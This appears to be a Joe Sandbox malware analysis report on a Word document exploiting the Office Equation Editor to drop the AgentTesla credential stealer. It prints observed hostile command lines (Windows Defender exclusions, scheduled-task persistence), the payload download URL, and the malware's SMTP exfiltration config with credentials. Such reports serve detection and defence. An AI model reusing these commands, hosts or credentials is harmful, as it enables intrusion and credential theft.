Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Remittance 17042024.doc

Overview

General Information

Sample name:Remittance 17042024.doc
Analysis ID:1427896
MD5:3a70ce88c392ad13548a5337379ec365
SHA1:759142b5f93e6b7821c9eb30639448fc2fd13cd4
SHA256:45d5436e268ed053f251044846ac8f0c5c09015cc87c4ccbdc86c4efbad9e570
Tags:doc
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Scheduled temp file as task from temp location
Yara detected AgentTesla
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Adds a directory exclusion to Windows Defender
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Document exploit detected (process start blacklist hit)
Drops PE files with a suspicious file extension
Injects a PE file into a foreign processes
Installs a global keyboard hook
Installs new ROOT certificates
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Equation Editor Network Connection
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Microsoft Office Child Process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains embedded VBA macros
Document misses a certain OLE stream usually present in this Microsoft Office document type
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Suspicious Screensaver Binary File Creation
Stores large binary data to the registry
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 3228 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 3308 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • dzoihohj75439.scr (PID: 3456 cmdline: "C:\Users\user\AppData\Roaming\dzoihohj75439.scr" MD5: 60E4F25FA64A0EF31AC57663A26DA790)
        • powershell.exe (PID: 3512 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dzoihohj75439.scr" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
        • powershell.exe (PID: 3540 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\egFUHsL.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
        • schtasks.exe (PID: 3592 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\egFUHsL" /XML "C:\Users\user\AppData\Local\Temp\tmp871B.tmp" MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
        • dzoihohj75439.scr (PID: 3776 cmdline: "C:\Users\user\AppData\Roaming\dzoihohj75439.scr" MD5: 60E4F25FA64A0EF31AC57663A26DA790)
        • dzoihohj75439.scr (PID: 3788 cmdline: "C:\Users\user\AppData\Roaming\dzoihohj75439.scr" MD5: 60E4F25FA64A0EF31AC57663A26DA790)
    • EQNEDT32.EXE (PID: 3584 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • taskeng.exe (PID: 3800 cmdline: taskeng.exe {E15E873E-836C-4FC1-A12D-690BEBE78D2E} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1] MD5: 65EA57712340C09B1B0C427B4848AE05)
    • egFUHsL.exe (PID: 3884 cmdline: C:\Users\user\AppData\Roaming\egFUHsL.exe MD5: 60E4F25FA64A0EF31AC57663A26DA790)
      • powershell.exe (PID: 3956 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\egFUHsL.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
      • powershell.exe (PID: 3976 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\egFUHsL.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
      • schtasks.exe (PID: 4088 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\egFUHsL" /XML "C:\Users\user\AppData\Local\Temp\tmp9A3D.tmp" MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
      • egFUHsL.exe (PID: 312 cmdline: "C:\Users\user\AppData\Roaming\egFUHsL.exe" MD5: 60E4F25FA64A0EF31AC57663A26DA790)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "smtp.fshpxm.com", "Username": "origin@fshpxm.com", "Password": "gG(YGS^4"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
Remittance 17042024.docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x1fa99:$obj2: \objdata
  • 0x1fab3:$obj3: \objupdate
  • 0x1fa74:$obj6: \objlink

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000D.00000002.718122401.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    0000000D.00000002.718122401.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000016.00000002.718596214.0000000002351000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000016.00000002.718596214.0000000002351000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          0000000D.00000002.718610223.0000000002591000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 9 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            5.2.dzoihohj75439.scr.3419a00.6.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              5.2.dzoihohj75439.scr.3419a00.6.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                5.2.dzoihohj75439.scr.3419a00.6.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                • 0x32393:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                • 0x32405:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                • 0x3248f:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                • 0x32521:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                • 0x3258b:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                • 0x325fd:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                • 0x32693:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                • 0x32723:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                5.2.dzoihohj75439.scr.33de1e0.7.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  5.2.dzoihohj75439.scr.33de1e0.7.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    Click to see the 13 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Equation Editor Network Connection
                    Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 104.21.83.128, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3308, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dzoihohj75439.scr", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dzoihohj75439.scr", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\dzoihohj75439.scr", ParentImage: C:\Users\user\AppData\Roaming\dzoihohj75439.scr, ParentProcessId: 3456, ParentProcessName: dzoihohj75439.scr, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dzoihohj75439.scr", ProcessId: 3512, ProcessName: powershell.exe
                    Sigma detected: Suspicious Microsoft Office Child Process
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Users\user\AppData\Roaming\dzoihohj75439.scr", CommandLine: "C:\Users\user\AppData\Roaming\dzoihohj75439.scr", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\dzoihohj75439.scr, NewProcessName: C:\Users\user\AppData\Roaming\dzoihohj75439.scr, OriginalFileName: C:\Users\user\AppData\Roaming\dzoihohj75439.scr, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3308, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\dzoihohj75439.scr", ProcessId: 3456, ProcessName: dzoihohj75439.scr
                    Sigma detected: Powershell Defender Exclusion
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dzoihohj75439.scr", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dzoihohj75439.scr", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\dzoihohj75439.scr", ParentImage: C:\Users\user\AppData\Roaming\dzoihohj75439.scr, ParentProcessId: 3456, ParentProcessName: dzoihohj75439.scr, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dzoihohj75439.scr", ProcessId: 3512, ProcessName: powershell.exe
                    Sigma detected: SCR File Write Event
                    Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3308, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\JBNvj66BwYU3yCv[1].scr
                    Sigma detected: Suspicious Add Scheduled Task Parent
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\egFUHsL" /XML "C:\Users\user\AppData\Local\Temp\tmp871B.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\egFUHsL" /XML "C:\Users\user\AppData\Local\Temp\tmp871B.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\dzoihohj75439.scr", ParentImage: C:\Users\user\AppData\Roaming\dzoihohj75439.scr, ParentProcessId: 3456, ParentProcessName: dzoihohj75439.scr, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\egFUHsL" /XML "C:\Users\user\AppData\Local\Temp\tmp871B.tmp", ProcessId: 3592, ProcessName: schtasks.exe
                    Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
                    Source: DNS queryAuthor: Brandon George (blog post), Thomas Patzke: Data: Image: C:\Users\user\AppData\Roaming\dzoihohj75439.scr, QueryName: ip-api.com
                    Sigma detected: Suspicious Outbound SMTP Connections
                    Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 208.91.198.143, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\AppData\Roaming\dzoihohj75439.scr, Initiated: true, ProcessId: 3788, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
                    Sigma detected: Suspicious Schtasks From Env Var Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\egFUHsL" /XML "C:\Users\user\AppData\Local\Temp\tmp871B.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\egFUHsL" /XML "C:\Users\user\AppData\Local\Temp\tmp871B.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\dzoihohj75439.scr", ParentImage: C:\Users\user\AppData\Roaming\dzoihohj75439.scr, ParentProcessId: 3456, ParentProcessName: dzoihohj75439.scr, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\egFUHsL" /XML "C:\Users\user\AppData\Local\Temp\tmp871B.tmp", ProcessId: 3592, ProcessName: schtasks.exe
                    Sigma detected: Suspicious Screensaver Binary File Creation
                    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3308, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\JBNvj66BwYU3yCv[1].scr
                    Sigma detected: Modification of IE Registry Settings
                    Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3308, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dzoihohj75439.scr", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dzoihohj75439.scr", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\dzoihohj75439.scr", ParentImage: C:\Users\user\AppData\Roaming\dzoihohj75439.scr, ParentProcessId: 3456, ParentProcessName: dzoihohj75439.scr, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dzoihohj75439.scr", ProcessId: 3512, ProcessName: powershell.exe
                    Sigma detected: Office Macro File Creation
                    Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3228, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                    Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
                    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3512, TargetFilename: C:\Users\user\AppData\Local\Temp\rstwkshw.nod.ps1

                    Persistence and Installation Behavior

                    barindex
                    Sigma detected: Scheduled temp file as task from temp location
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\egFUHsL" /XML "C:\Users\user\AppData\Local\Temp\tmp871B.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\egFUHsL" /XML "C:\Users\user\AppData\Local\Temp\tmp871B.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\dzoihohj75439.scr", ParentImage: C:\Users\user\AppData\Roaming\dzoihohj75439.scr, ParentProcessId: 3456, ParentProcessName: dzoihohj75439.scr, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\egFUHsL" /XML "C:\Users\user\AppData\Local\Temp\tmp871B.tmp", ProcessId: 3592, ProcessName: schtasks.exe

                    Snort Signatures

                    No Snort rule has matched

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 13.2.dzoihohj75439.scr.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "smtp.fshpxm.com", "Username": "origin@fshpxm.com", "Password": "gG(YGS^4"}
                    Multi AV Scanner detection for domain / URL
                    Source: covid19help.topVirustotal: Detection: 24%Perma Link
                    Source: https://covid19help.top/JBNvj66BwYU3yCv.scrVirustotal: Detection: 22%Perma Link
                    Source: https://covid19help.top/Virustotal: Detection: 23%Perma Link
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\JBNvj66BwYU3yCv[1].scrReversingLabs: Detection: 70%
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\JBNvj66BwYU3yCv[1].scrVirustotal: Detection: 63%Perma Link
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrReversingLabs: Detection: 70%
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrVirustotal: Detection: 63%Perma Link
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeReversingLabs: Detection: 70%
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeVirustotal: Detection: 63%Perma Link
                    Multi AV Scanner detection for submitted file
                    Source: Remittance 17042024.docReversingLabs: Detection: 44%
                    Source: Remittance 17042024.docVirustotal: Detection: 45%Perma Link
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\JBNvj66BwYU3yCv[1].scrJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeJoe Sandbox ML: detected

                    Exploits

                    barindex
                    Office equation editor establishes network connection
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 104.21.83.128 Port: 443Jump to behavior
                    Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\dzoihohj75439.scr
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\dzoihohj75439.scrJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                    Source: unknownHTTPS traffic detected: 104.21.83.128:443 -> 192.168.2.22:49161 version: TLS 1.2

                    Software Vulnerabilities

                    barindex
                    Document exploit detected (process start blacklist hit)
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                    Source: global trafficDNS query: name: covid19help.top
                    Source: global trafficDNS query: name: ip-api.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: ip-api.com
                    Source: global trafficDNS query: name: ip-api.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
                    Source: global trafficDNS query: name: smtp.fshpxm.com
